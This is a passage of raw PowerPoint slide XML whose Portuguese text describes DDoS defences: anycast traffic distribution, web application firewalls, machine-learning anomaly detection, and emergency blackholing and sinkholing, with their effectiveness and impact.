            <a:off x="5343525" y="46863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Vantagens:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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3525" y="4904184"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5422106" y="4900613"/>
            <a:ext cx="214510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 o tráfego de ataque entre vários PoPs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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3525" y="5075634"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Text 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5422106" y="5072063"/>
            <a:ext cx="181147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Dilui o impacto em qualquer local único</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7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3525" y="5247084"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5422106" y="5243513"/>
            <a:ext cx="285158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Permite que a capacidade agregada da rede absorva o ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7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3525" y="5418534"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Text 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5422106" y="5414963"/>
            <a:ext cx="1950439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Melhora a latência para usuários legítimos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Shape 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="6086475"/>
            <a:ext cx="4200525" cy="31003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5" name="Shape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="62293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7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0063" y="6322219"/>
            <a:ext cx="214313" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Text 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="6229350"/>
            <a:ext cx="183387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Web Application Firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Shape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2712560" y="6250781"/>
            <a:ext cx="519317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9" name="Text 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2712560" y="6250781"/>
            <a:ext cx="59075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Camada 7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Text 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="6457950"/>
            <a:ext cx="24103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Proteção específica para aplicações web</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Text 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="668655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Focados na proteção da camada de aplicação (L7), os WAFs inspecionam o tráfego HTTP/S em busca de padrões maliciosos:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Shape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="7115175"/>
            <a:ext cx="1685925" cy="7143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3" name="Text 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="942975" y="7172325"/>
            <a:ext cx="1643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Regras Baseadas em Assinaturas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Text 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="942975" y="7543800"/>
            <a:ext cx="1643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Bloqueio de padrões conhecidos de ataque com base em regras predefinidas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Shape 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657475" y="7115175"/>
            <a:ext cx="1685925" cy="7143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6" name="Text 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714625" y="7172325"/>
            <a:ext cx="16430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Desafios de Verificação</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Text 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714625" y="7372350"/>
            <a:ext cx="1643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CAPTCHAs, desafios JavaScript, cookies de sessão para distinguir bots de humanos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Shape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="7915275"/>
            <a:ext cx="3457575" cy="10572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9" name="Text 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="80010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Capacidades Avançadas:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Text 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="8201025"/>
            <a:ext cx="33575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Limitação de taxa por sessão/IP/região</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Text 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="8343900"/>
            <a:ext cx="33575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Detecção de bots maliciosos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Text 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="8486775"/>
            <a:ext cx="33575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Proteção contra ataques de força bruta</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Text 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="8629650"/>
            <a:ext cx="33575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Mitigação de ataques Slow HTTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Text 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="8772525"/>
            <a:ext cx="33575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Análise comportamental de clientes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Shape 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="6086475"/>
            <a:ext cx="4200525" cy="31003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6" name="Shape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="62293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9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469" y="6322219"/>
            <a:ext cx="171450" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Text 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264944" y="6229350"/>
            <a:ext cx="272341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Baseada em Comportamento</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Shape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7974071" y="6250781"/>
            <a:ext cx="347616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00" name="Text 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7974071" y="6250781"/>
            <a:ext cx="41905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ML/IA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Text 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264944" y="6457950"/>
            <a:ext cx="31281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avançada de anomalias</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Text 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="6686550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 algoritmos de Machine Learning (ML) para aprender os padrões de tráfego normais e identificar desvios:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Shape 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="7115175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4" name="Text 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="72009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Processo:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Text 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5457825" y="7400925"/>
            <a:ext cx="32432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Coleta contínua de dados de tráfego</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Text 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5457825" y="7543800"/>
            <a:ext cx="32432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Estabelecimento de linha de base (baseline) do comportamento normal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Text 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5457825" y="7686675"/>
            <a:ext cx="32432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Identificação de anomalias e desvios estatísticos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Text 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5457825" y="7829550"/>
            <a:ext cx="32432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Classificação de ameaças e acionamento de mitigações</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="8115300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10" name="Text 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="8201025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Vantagens:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="111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43525" y="8409980"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Text 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414963" y="8409980"/>
            <a:ext cx="2492164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de ataques de dia zero (sem assinaturas conhecidas)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11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43525" y="8552855"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Text 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414963" y="8552855"/>
            <a:ext cx="1992046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Adaptação automática a novos padrões de tráfego</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="115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43525" y="8695730"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Text 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414963" y="8695730"/>
            <a:ext cx="187283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Redução de falsos positivos ao longo do tempo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117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3525" y="8838605"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Text 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414963" y="8838605"/>
            <a:ext cx="228739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 de identificar ataques sutis e de baixo volume</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Shape 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="9344025"/>
            <a:ext cx="8572500" cy="258603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20" name="Shape 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="948690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21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0778" y="9579769"/>
            <a:ext cx="192881" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Text 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="9486900"/>
            <a:ext cx="157226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Técnicas de Resposta</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Shape 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2450948" y="9508331"/>
            <a:ext cx="600326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24" name="Text 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2450948" y="9508331"/>
            <a:ext cx="671764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Emergência</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Text 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="9715500"/>
            <a:ext cx="222974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Medidas de último recurso (usar com cautela)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Shape 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="9944100"/>
            <a:ext cx="3829050" cy="12573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27" name="Shape 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000125" y="10058400"/>
            <a:ext cx="228600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DC2626"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128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4419" y="10122694"/>
            <a:ext cx="100013" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Text 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314450" y="10086975"/>
            <a:ext cx="7192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Blackholing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Text 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000125" y="103441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Instrui os roteadores a descartar todo o tráfego destinado ao IP da vítima.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Text 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000125" y="10553105"/>
            <a:ext cx="424049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Eficácia:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Text 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352736" y="10553105"/>
            <a:ext cx="1515452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Alta para parar o ataque rapidamente</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Text 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000125" y="10695980"/>
            <a:ext cx="42865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Impacto:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Text 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357340" y="10695980"/>
            <a:ext cx="1639239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Bloqueia também todo o tráfego legítimo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="135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0125" y="10838855"/>
            <a:ext cx="85725" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Text 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114425" y="10838855"/>
            <a:ext cx="1782170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Resulta em negação de serviço auto-infligida</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Shape 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4886325" y="9944100"/>
            <a:ext cx="3829050" cy="12573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38" name="Shape 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5000625" y="10058400"/>
            <a:ext cx="228600" cy="228600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139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58668" y="10122694"/>
            <a:ext cx="112514" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Text 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="10086975"/>
            <a:ext cx="6556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Sinkholing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Text 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5000625" y="10344150"/>
            <a:ext cx="36718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Redireciona o tráfego malicioso para um endereço específico (sinkhole) para análise ou descarte.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Text 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5000625" y="10695980"/>
            <a:ext cx="424049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Eficácia:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Text 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5353236" y="10695980"/>
            <a:ext cx="1796653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Média, depende da precisão da identificação</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Text 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5000625" y="10838855"/>
            <a:ext cx="42865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Impacto:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Text 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357840" y="10838855"/>
            <a:ext cx="1825033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Menor que blackholing se bem implementado</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="146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00625" y="10981730"/>
            <a:ext cx="85725" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Text 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5114925" y="10981730"/>
            <a:ext cx="196818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Requer identificação precisa do tráfego de ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Shape 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="11315700"/>
            <a:ext cx="7829550" cy="4572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49" name="Shape 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="11315700"/>
            <a:ext cx="28575" cy="4572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50" name="Text 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="11415713"/>
            <a:ext cx="137185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Abordagem Recomendada:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Text 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="11415713"/>
